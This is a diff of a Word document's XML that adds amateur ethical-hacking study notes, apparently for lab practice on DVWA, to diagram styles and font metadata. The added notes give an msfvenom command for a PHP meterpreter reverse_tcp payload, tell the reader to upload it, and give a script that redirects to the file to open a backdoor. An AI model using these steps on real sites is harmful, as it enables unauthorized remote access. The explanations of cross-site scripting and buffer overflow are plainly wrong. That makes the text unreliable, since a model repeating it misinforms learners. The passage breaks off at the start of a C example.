+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans2D3">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans2D4">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor">
+        <a:schemeClr val="lt1"/>
+      </a:fontRef>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans1D1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans1D2">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans1D3">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="parChTrans1D4">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAcc1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="conFgAcc1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="alignAcc1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="trAlignAcc1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="bgAcc1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="solidFgAcc1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="solidAlignAcc1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="solidBgAcc1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAccFollowNode1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="alignAccFollowNode1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="bgAccFollowNode1">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAcc0">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAcc2">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAcc3">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAcc4">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="bgShp">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="dkBgShp">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="trBgShp">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgShp">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="2">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="1">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="revTx">
+    <dgm:scene3d>
+      <a:camera prst="orthographicFront"/>
+      <a:lightRig rig="threePt" dir="t"/>
+    </dgm:scene3d>
+    <dgm:sp3d/>
+    <dgm:txPr/>
+    <dgm:style>
+      <a:lnRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:lnRef>
+      <a:fillRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:fillRef>
+      <a:effectRef idx="0">
+        <a:scrgbClr r="0" g="0" b="0"/>
+      </a:effectRef>
+      <a:fontRef idx="minor"/>
+    </dgm:style>
+  </dgm:styleLbl>
+</dgm:styleDef>
+</file>
+
 <file path=word/glossary/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:glossaryDocument xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:docParts>
@@ -14047,7 +18582,7 @@
     <w:charset w:val="00"/>
     <w:family w:val="roman"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E0002AFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Symbol">
     <w:panose1 w:val="05050102010706020507"/>
@@ -14075,14 +18610,14 @@
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E0002AFF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Calibri Light">
     <w:panose1 w:val="020F0302020204030204"/>
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E0002AFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="A0002AEF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
 </w:fonts>
 </file>
@@ -14106,6 +18641,7 @@
     <w:rsid w:val="001A5E18"/>
     <w:rsid w:val="00234847"/>
     <w:rsid w:val="00314E12"/>
+    <w:rsid w:val="004F3814"/>
     <w:rsid w:val="005D2E6F"/>
     <w:rsid w:val="006E4C0C"/>
     <w:rsid w:val="007761E0"/>
@@ -14113,6 +18649,7 @@
     <w:rsid w:val="008C31A7"/>
     <w:rsid w:val="00A418DD"/>
     <w:rsid w:val="00BC42A6"/>
+    <w:rsid w:val="00E64DFA"/>
   </w:rsids>
   <m:mathPr>
     <m:mathFont m:val="Cambria Math"/>
@@ -14843,7 +19380,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2CEE33B2-E558-4AE1-93CE-7950069EFE6D}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7B84641B-06F3-4F45-96DC-943E968650D4}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/CyberSecurity.docx
+++ b/CyberSecurity.docx
@@ -9968,6 +9968,115 @@
     <w:p/>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>OWASP [open web application security projects]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now obviously since we cannot attack a live website for fun sake or even seriously until and unless if requested by the owner this OWASP project helps us in understanding the different attacks that we can perform on a web server. To put forward this concept simply we can say this is an OS that acts like an server and allows us to attack it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>How to run OWASP: IT is similar to all other OS but this is CUI only. If You have the virtual ready disk it’s more simple .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The OWASP pages can be accesses from the web browser for different attacks. The DVWA(damn vulnerability web attacks ) contains the pages on which different we attacks can be done.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cross site scripting attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This attack is done by uploading a Trojan to a web site and executing i</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t with the help of a script that is given to the web. The script is entered into the message blocks or text fields.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Solution: Validate the uploads and the entries in the text areas before taking in.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This is done in similar fashion to java and windows payload attacks. Here we will be creating a php file instead of a .exe file and upload it to the we site. This when execute will open the backdoor to the attacker.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Since there are some issues with the new kali venom tools use old kali payload tool for this experiment.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>For creating a payload: msfvenom –p php/meterpreter/reverse_tcp –f raw&gt;filename.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now upload this to the server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Now we need to run a script on the page to execute this file.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Script:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;script&gt; window.location=</w:t>
+      </w:r>
+      <w:hyperlink w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://ipofserver(192.168.1.107 in my case)/dvwa/hackable/uploads/filename.php</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Executing this we will get a backdoor.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
           <w:u w:val="single"/>
@@ -9978,7 +10087,6 @@
           <w:b/>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Trojans:</w:t>
       </w:r>
       <w:r>
@@ -10263,7 +10371,6 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Sniffing</w:t>
       </w:r>
     </w:p>
@@ -10391,6 +10498,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Telnet passwords</w:t>
       </w:r>
     </w:p>
@@ -10555,11 +10663,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">DDOS attack: This is a kind of DOS attack that totally hides the attackers and the attack. In normal DOS attack only one attacker will be there. It is same in the DDOS attack but the attacker pretends to be many people and sends the packets. This causes a difficulty for the </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">server managers to point the attackers but still they can stop the attack by limiting the number of packets from each IP. </w:t>
+        <w:t xml:space="preserve">DDOS attack: This is a kind of DOS attack that totally hides the attackers and the attack. In normal DOS attack only one attacker will be there. It is same in the DDOS attack but the attacker pretends to be many people and sends the packets. This causes a difficulty for the server managers to point the attackers but still they can stop the attack by limiting the number of packets from each IP. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10646,6 +10750,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>BOT NET: This is automated virus. This simply reflects itself and attacks all the victims that are vulnerable and opens the backdoor to the attacker.</w:t>
       </w:r>
     </w:p>
@@ -10678,9 +10783,207 @@
       <w:r>
         <w:t>and crazypinger etc.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Buffer Overflow</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Buffer is used for temporary storage of data that yet needs to be processed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Controls the flow so that the CPU does not get overwhelmed. Since there are a variety of that are connected to the system it responsibility of the Buffer(RAM) to control the flow. If flow is not controlled it leads to grater load and stress over the CPU which is unnecessary.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Buffer also stops data overlapping. It add or leaves extra space after each memory space to store extra bits if necessary, this helps in stopping the data overflows.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="33"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">When buffer is buffer overflows it does not know what to do. So instead it sends the overflow data to the CPU which is the master of all. The CPU does understand what is it looking at so it forwards it to the OS for help. Now when the OS receives the data it thinks it as a command since </w:t>
+      </w:r>
+      <w:r>
+        <w:t>it is received from the CPU so instead of checking , it will directly executes as a command.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Here is small program in C to understand the buffer overflow attack. This attack can be done with any other languages or scripts also.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Buffer.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>#include&lt;stdio.h&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
